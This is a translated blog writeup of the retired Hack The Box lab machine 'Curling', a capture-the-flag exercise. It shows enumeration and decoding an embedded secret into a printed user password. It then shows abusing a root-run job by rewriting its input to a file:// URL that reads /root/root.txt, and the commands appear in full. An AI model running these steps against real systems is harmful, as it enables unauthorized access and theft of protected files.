![\"Hack](\"/static/0da9a3a8737ef19f8ff8980445608ccd/c8042/327080.png\" "\\"Hack")
\n \n\nThis page has been machine-translated from the original page.
\n
I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.
\n\n \n \n\n This time I am writing up the retired HackTheBox machine “Curling”.
\n\nThe content of this article is not intended to encourage acts that are contrary to social order.
\nPlease note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).
\nAll statements here are my own and do not represent any organization I belong to.
\n\nI started with the usual enumeration.
\n$ sudo sed -i 's/^[0-9].*$RHOST/10.10.10.150 $RHOST/g' /etc/hosts\n$ nmap -sV -sC -Pn -T4 $RHOST| tee nmap1.txt\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)\n| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)\n|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)\n80/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-generator: Joomla! - Open Source Content Management\n|_http-title: Home\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 24.61 secondsPort 80 was open so I accessed it — it looked like a CMS.
\nI explored the Joomla installation using the following reference but could not find any exploitable entry point.
\nReference: Attacking and Enumerating Joomla | HackerTarget.com
\nAfter reading through the page source, I noticed that secret.txt was embedded in it.
Accessing that URL showed a suspicious-looking string.
\nRunning it through CyberChef’s Magic recipe revealed it was a Base64-encoded password.
\nOpening it showed that a hexdump of binary data had been saved as a text file.
\nRunning it through Magic showed it could be decompressed with Bzip2.
\nThe output was still unclear at that point.
\nUsing “From Hexdump” to download it as a binary file revealed it was a tar archive. Extracting it yielded Floris’s password, and I was able to retrieve the user flag.
\n$ tar xvf download.tar \npassword.txt\n\n$ cat password.txt \n5d<wdCbdZu)|hChXllUsing this password I could now log in via SSH, so I continued from there.
\nI uploaded linpeas to perform further enumeration.
\n$ scp /home/kali/Hacking/Tools/linpeas.sh floris@$RHOST:/home/floris\n\n$ ./linpeas.sh tee lipeas.txtThe owner of certain files appeared to be root.
\nLooking at the linpeas output, these same files appeared under Modified interesting files in the last 5mins.
It looked like some root-owned job was running in the background.
\nI could not identify exactly which process was touching them, but as a test I modified the address in input to url = \"http://10.10.14.4:5000\", and my local machine received a connection.
I thought about this for a while. If the process could access arbitrary URLs with root privileges, simply changing the URI scheme to file:// should allow reading any file on the system.
So I set the destination in input as follows, and was able to retrieve the root flag.
$ echo 'url = \"file:///root/root.txt\"' > inputThe initial enumeration took some time, but overall this was a straightforward machine.
","fields":{"slug":"/hackthebox-linux-curling-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-01","description":"A writeup of the retired HackTheBox machine 'Curling'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Curling (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-curling-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}